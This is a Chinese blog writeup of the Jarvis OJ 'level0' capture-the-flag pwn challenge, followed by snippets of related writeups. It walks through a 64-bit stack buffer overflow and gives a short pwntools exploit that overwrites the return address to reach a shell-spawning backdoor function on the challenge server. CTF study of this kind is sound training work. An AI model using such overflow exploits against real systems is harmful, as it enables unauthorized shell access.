Jarvis OJ level0 writeup

最新推荐文章于 2023-08-20 20:27:09 发布
原创 最新推荐文章于 2023-08-20 20:27:09 发布 · 407 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Jarvis OJ level0 #栈溢出

本文详细解析了JarvisOJlevel0writeup的解题过程,包括检查程序保护、使用IDA查看反汇编代码、定位缓冲区溢出点及利用system函数获取shell。通过Python编写payload,成功获得flag。

Jarvis OJ level0 writeup(萌新一枚,不足之处还请大佬指点)

拿到这个题目,首先查看一下保护:
在这里插入图片描述
可以看到NX打开,堆栈不可执行(在这题中也没什么用)
打开IDA查看一下:
在这里插入图片描述
点击右边的main会进入反汇编代码,通过反汇编可以看到main函数调用了一个vul()函数,我们双击函数跳转:

在这里插入图片描述
由汇编代码可以看出buf缓存区离rbp(前栈帧)有0x80h的距离,也就是说距离返回地址有0x88h的距离。
(因为这是64位的程序所以rbp是8个字节,故加8达到rip)
找到溢出点后,我们找找什么能用的代码段,由于这题比较简单,题目直接给出了system("/bin/sh"),我们就直接用就可以了。
在这里插入图片描述
双击callsystem查看他的地址,下面是exp:

#! usr/bin/env python
from pwn import *
p=remote('pwn2.jarvisoj.com',9881)
payload='a'*0x88+p64(0x0400596)
p.recvuntil("Hello, World\n")
p.sendline(payload)
p.interactive()

然后我们就获得flag了。
在这里插入图片描述

PLpa、
关注
【BUUCTF - PWN】jarvisoj_level0
古月浪子的博客
04-05 788
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 402
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
日行一PWN jarvisoj_level0
m0_57221101的博客
05-14 270
还是来自于BUUCTF的机器,今天的很简单,就是单纯的考察了read函数的漏洞,以及对64位寄存器的理解 开始 首先还是经典查壳和内存保护,发现啥也没有,是很简单的机器。然后IDA反编译一下,由于是64位的软件所以需要IDA64 main函数 首先可以看到主函数中知识调用了write函数,并输出了Hello, Worldn这么几个字到终端。 之后调用了vulnerable_function函数 因为反汇编并不会给出类似于write这种函数的定义, 所以需要熟悉汇编的同学自行根据效果来
Jarvis OJ - [XMAN]level0 - Writeup
baikeng3674的博客
09-25 208
Jarvis OJ - [XMAN]level0 - Writeup M4x原创,转载请标明出处http://www.cnblogs.com/WangAoBo/p/7591552.html 来补jarvis pwn的分析了,之后几天会全都补回来 tell me something与level0类似,不再写详细Writeup 题目: 分析: ...
Buu CTF PWN jarvisoj_level0 WriteUp
m0sway的博客
03-02 444
Buu CTF PWN题jarvisoj_level0WriteUp
Jarvis OJ level1
Kni9hT's Blog
11-08 654
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
BUUCTF jarvisoj_level2 题解
qq_51802916的博客
08-20 619
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
笔记向——PWN jarvis oj level0
m0_52133692的博客
11-11 239
题目下载链接:https://dn.jarvisoj.com/challengefiles/level0.b9ded3801d6dd36a97468e128b81a65d 地址:nc pwn2.jarvisoj.com 9881 本人环境: ida反汇编工具(吾爱破解可下载到) 系统Ubuntu 18.04(linux的一个版本) pwntools(终端输入:sudo pip pwntools install 即可安装) pwndbg(终端输入:sudo clone https://github.com/p
jarvisoj_level0
zip471642048的博客
01-17 453
jarvisoj_level0 pwn的最简单的题目了,难的我是真不会了,说一下做题思路 首先拿到题目checksec检查一下开了什么东西 64位程序什么都没有开,太好了,开了东西就不会了~~。 ida64位查看shift+F12看一下,看到了、/bin/bash和system,然后就是Hello World 查看main函数 跟进vulnerable_function,很明显在这里发生溢出,buf的大小只有0x80但是缺接收了0x200导致溢出 gdb-peda调试程序,创建150用于溢出的字符串
jarvisOJ-level0
qq_35661990的博客
09-28 349
jarvisOJ上的题目梯度似乎比pwnable.tw上的题目更合理点,pwnable.kr目前做的十几题都是考察各种基础,只有少数像pwn题。 level0是考最基础的ROP 先把下载的文件放进IDA里看看 .text:00000000004005C6 main proc near ; DATA XREF: _start+1D↑o .te...
CTF buuoj pwn-----第6题:jarvisoj_level0
bing_Max的博客
09-02 1162
CTF buuoj pwn-----第6题:ciscn_2019_n_1前言一、checksec 检测文件的保护机制二. 静态分析,IDA打开文件三. 编写EXP四. 运行EXP, 获取flag 前言 记录一下pwn的过程, 新手学习日记, 流水线记录. 打开题目, 连接靶机,下载文件level0 一、checksec 检测文件的保护机制 bing@bing-virtual-machine:~/pwn$ checksec ./level0 [*] '/home/bing/pwn/level0'
jarvis oj level0
发蝴蝶和大脑斧的博客
12-01 970
菜鸟入门,先从level0开始下手。 首先checksec,发现开启了nx保护。 Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 拖进64位ida,查看vulnerable_function ssize_t...
JarvisOJ-PWN-Level0
杀生丸?不,其实我要的是桔梗
03-15 825
JarvisOJ-PWN-Level0 IDA打开分析。 在Export找到这两个关键函数。 先双击进入main 关键函数在vulnerable_function(),继续跟进。 可以看出read函数是把标准输入的200位的写入buf中。 再看buf: 低位: 高位: 所以buf的首地址到返回地址共=(+0x0000000000000008) - (-0x00...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值